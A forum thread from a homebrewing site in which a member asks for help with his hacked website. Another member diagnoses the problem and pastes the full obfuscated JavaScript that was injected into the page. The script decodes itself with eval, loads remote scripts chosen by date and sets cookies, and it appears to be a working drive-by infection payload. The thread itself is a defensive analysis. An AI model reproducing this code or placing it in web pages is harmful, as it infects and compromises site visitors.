Anyone know how to clean up a possibly infected website? - Home Brew Forums

Register Now!
Home Brew Forums > Home Brewing Community > General Chit Chat > Anyone know how to clean up a possibly infected website?

Reply
 
Thread Tools
Old 07-11-2010, 12:06 AM   #1
Laughing_Gnome_Invisible
 
Laughing_Gnome_Invisible's Avatar
Recipes 
 
Jan 2008
Posts: 12,250
Liked 697 Times on 513 Posts



I'm not looking for instructions, I'm looking for someone that know how to do it for me!

I built my website a few years ago, it has been static for about 4 years. it now shows up as an attack page. I've looked into it as much as I know how to (Zero) From the links to Google, watched their vid on what to do etc......And I still don't have a fooking clue how to clean it up if it has been hacked.

If anyone knows what the hell I'm talking about, and has any clue how to fix it, then I would gladly repay them with gratitude and good wishes.

It's this site

PS Yes, I know I could go to lots of tech forums about this, but I somehow trust homebrewers more than I do strangers on geek forums.


 
Reply With Quote
Old 07-11-2010, 12:49 AM   #2
Symbiote
Recipes 
 
Jun 2010
Somewhere between the computers and the coffee pot.
Posts: 93


Your site looks like a big pile of Flash.

Flash exploits are everywhere, all day long.

Flash is a no-no. No Flash. None.

Flash bad. Beer good.

I looked at your source, and the offending code is here:

Code:
<script language="javascript">$a="Z6fpZ3dZ22Z2524aZ253dZ2522dw(dZ2563s(cZ2575Z252cZ25314Z2529);Z2522;Z22;dzZ3dZ22Z2566uZ256ecZ2574ioZ256e dZ2577(Z2574)Z257bcaZ253dZ2527Z252564ocuZ2525Z2536deZ25256eZ2574.wZ252572iZ2574Z252565Z252528Z25252Z2532Z2527;ceZ253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscrZ252569ptZ252520lZ2561Z256eZ252567Z252575Z2561Z252567Z252565Z25253dZ25255cZ252522jaZ2576Z2561Z2573criZ252570tZ25255Z2563Z252522Z25253eZ2527;cZ2563Z253dZ2527Z25253cZ25255cZ25252fscZ2572Z2569Z252570tZ25253eZ2527;evalZ2528uneZ2573Z2563aZ2570Z2565(Z2574Z2529)Z257d;Z22;czZ3dZ22Z2566uZ256eZ2563tiZ256fZ256e czZ2528Z2563z)Z257bretZ2575Z2572Z256e Z2563aZ252bcb+Z2563cZ252bcZ2564+cZ2565+czZ253b};Z22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dZ2573tZ253bdZ2563sZ2528Z2564Z2561Z252bdZ2562Z252bZ2564Z2563+Z2564Z2564Z252bdZ2565Z252c1Z2530)Z253bZ2564Z2577Z2528sZ2574Z2529;Z2573tZ253dZ2524aZ253bZ2522;Z22;cbZ3dZ229;sZ2574Z253dZ2574mpZ253dZ2527Z2527;fZ256fZ2572Z2528iZ253d0;Z2569Z253cdZ2573Z252elZ2565nZ22;ddZ3dZ22qb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iZ22;dcZ3dZ227Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fZ22;dbZ3dZ22gZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0!Z2520;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07hucZ22;ccZ3dZ22Z2567Z2574h;iZ252b+Z2529Z257btZ256dpZ253ddsZ252eslZ2569ceZ2528i,iZ252b1)Z253bZ2573tZ25Z22;cdZ3dZ223dstZ252bZ2553tZ2572ingZ252eZ2566Z2572omCZ2568aZ2572CZ256fdeZ2528(tmZ2570.Z2563Z2568Z22;caZ3dZ22Z2566unZ2563tioZ256e dZ2563s(Z2564sZ252cesZ2529Z257bdsZ253dunesZ2563apZ2565(dsZ252Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;}zpqd;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edZ22;deZ3dZ22uqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;ceZ3dZ22aZ2572CZ256fZ2564Z2565At(Z2530Z2529^(Z25270Z25780Z2530Z2527+esZ2529Z2529);}Z257dZ22;Z69f Z28Z64Z6fZ63uZ6deZ6et.Z63ooZ6biZ65Z2eiZ6edexZ4ff(Z27rfZ35fZ36Z64sZ27)Z3dZ3d-1)Z7bfuncZ74ioZ6e cZ61Z6cZ6cZ62ackZ28xZ29Z7bwiZ6edowZ2eZ74w Z3d Z78;vaZ72 dZ20Z3d newZ20Z44ateZ28Z29Z3bd.sZ65Z74Z54imeZ28xZ5bZ22asZ5fZ6fZ66Z22]*1Z3000)Z3bZ76aZ72 Z68Z20Z3d d.Z67eZ74UZ54CZ48oZ75rsZ28);Z77inZ64ow.Z68 Z3d h;Z69Z66 (hZ20Z3e 8)Z7bZ64Z2esetZ55TCDZ61teZ28Z64.geZ74UTZ43Z44Z61teZ28Z29 Z2d 2)Z3b}Z65lseZ7bd.Z73Z65tUTZ43Z44aZ74eZ28dZ2egZ65tUTZ43DZ61te(Z29 - Z33)Z3b}Z77iZ6eZ64owZ2eZ67dZ20Z3d d;Z76Z61Z72 tiZ6dZ65 Z3d newZ20Z41Z72rZ61Z79()Z3bvarZ20Z73hifZ74IZ6edexZ20Z3d Z22Z22;time[Z22Z79Z65arZ22]Z20Z3d Z64.geZ74Z55Z54CFuZ6cZ6cZ59earZ28);Z74imZ65[Z22monZ74hZ22] Z3d Z64.gZ65tZ55TCMZ6fZ6eZ74Z68Z28)+Z31Z3btiZ6dZ65[Z22dayZ22] Z3d dZ2egZ65Z74UTZ43Z44atZ65()Z3bZ69f Z28d.gZ65tUTZ43MonZ74Z68Z28)Z2b1 Z3c 1Z30)Z7bshZ69fZ74InZ64exZ20Z3d timZ65Z5bZ22yeaZ72Z22] +Z20Z22-0Z22 + Z28d.Z67etUZ54CZ4donZ74hZ28Z29+1Z29;Z7delsZ65Z7bshiZ66tInZ64Z65xZ20Z3d tZ69me[Z22Z79eaZ72Z22] Z2b Z22-Z22 + Z28d.gZ65tUZ54CMoZ6ethZ28)Z2bZ31);Z7dif Z28d.gZ65tUTZ43DatZ65Z28) Z3c 1Z30)Z7bshiZ66tIZ6edexZ20Z3dshZ69ftIZ6edexZ20+ Z22-0Z22 Z2bZ20dZ2egeZ74UTZ43DaZ74Z65Z28Z29;Z7delZ73eZ7bshiZ66tInZ64Z65x Z3d sZ68iZ66tInZ64ex Z2b Z22-Z22 Z2b Z64.Z67eZ74UTCZ44Z61Z74e(Z29;Z7dZ64Z6fcuZ6dZ65nt.Z77riZ74Z65(Z22Z3cscZ72Z22+Z22iptZ20Z6canZ67Z75agZ65Z3djavZ61sZ63ripZ74Z22+Z22 srcZ3dZ27httpZ3aZ2fZ2fseZ61rZ63h.tZ77Z69tZ74erZ2ecomZ2fZ74Z72Z65Z6edsZ2fdaiZ6cy.jZ73onZ3fdaZ74eZ3dZ22+ Z73hifZ74IndZ65x+Z22&caZ6clbaZ63kZ3dcZ61Z6clbaZ63kZ32Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iZ70tZ3eZ22);} fZ75nctZ69oZ6eZ20caZ6cZ6cbacZ6b2Z28Z78)Z7bwindZ6fw.tZ77 Z3d xZ3bsZ63(Z27Z72Z665Z666dZ73Z27,Z32Z2c7);Z65valZ28Z75nZ65scZ61pe(Z64z+cZ7a+Z6fZ70+sZ74Z29Z2bZ27dwZ28Z64z+cZ7a(Z24a+Z73tZ29Z29;Z27);docZ75menZ74.wZ72Z69te(Z24Z61Z29;}dZ6fcuZ6dZ65nt.Z77ritZ65(Z22Z3cimZ67 sZ72cZ3dZ27http:Z2fZ2fsearcZ68.twZ69tZ74Z65r.Z63omZ2fiZ6dagZ65Z73Z2fsearchZ2frsZ73.pnZ67Z27 widZ74hZ3d1 hZ65igZ68Z74Z3d1 sZ74yleZ3dZ27viZ73Z69bilZ69tyZ3ahZ69ddZ65Z6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt lanZ67uZ61geZ3djavZ61scZ72ipZ74Z22+Z22 srcZ3dZ27httZ70Z3aZ2fZ2fseZ61rchZ2etwiZ74tZ65rZ2ecZ6fmZ2ftZ72eZ6edsZ2fdaiZ6cZ79.Z6asZ6fn?cZ61llZ62ackZ3dZ63Z61llZ62acZ6bZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}Z65Z6cseZ7b$aZ3dZ27Z27};funcZ74iZ6fZ6eZ20Z73c(Z63nZ6dZ2cv,eZ64)Z7bvZ61rZ20exdZ3dnewZ20Z44atZ65Z28Z29;exZ64.sZ65Z74Z44atZ65(exZ64Z2egeZ74DaZ74e(Z29+edZ29;Z64oZ63umeZ6etZ2ecZ6fokiZ65Z3dcnm+Z20Z27Z3dZ27 +Z65sZ63aZ70e(vZ29+Z27;expZ69Z72esZ3dZ27+exd.tZ6fGZ4dZ54SZ74Z72ingZ28);}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));</script>
Likely someone has tacked it onto your page with an off-the-shelf script kiddie program.

As for the insertion vector, without shell access I really can't tell you how they got in.

You should edit your html by hand (step slowly AWAY from the Dreamweaver) and remove the offending code.

Of course until you secure the site, it may be infected again shortly.

From your WHOIS info I can't tell who owns your IP.

Are you on bargain shared hosting, VPS, dedicated?
__________________
Primary 1: Experimental Apfelwein

Primary 2: Experimental Apfelwein

US politics is like pro wrestling, with a nuclear option.

 
Reply With Quote
Old 07-11-2010, 06:12 PM   #3
Laughing_Gnome_Invisible
 
Laughing_Gnome_Invisible's Avatar
Recipes 
 
Jan 2008
Posts: 12,250
Liked 697 Times on 513 Posts


Thanks, Symbiote! I'm onto it.

 
Reply With Quote
Reply
Thread Tools


Similar Threads
Thread Thread Starter Forum Replies Last Post
Possibly a new hobby- soap? Yooper General Chit Chat 20 07-27-2009 06:43 PM
Website help dataz722 General Chit Chat 9 03-13-2009 02:44 AM
Possibly the greatest beer joke ever leftyguitarjoe General Chit Chat 10 01-26-2009 03:22 PM
Possibly the worst beer review site ever Tenchiro General Chit Chat 25 07-10-2008 03:14 AM
How bored can I possibly be... Brewing Clamper General Chit Chat 7 12-14-2007 07:58 PM


Forum Jump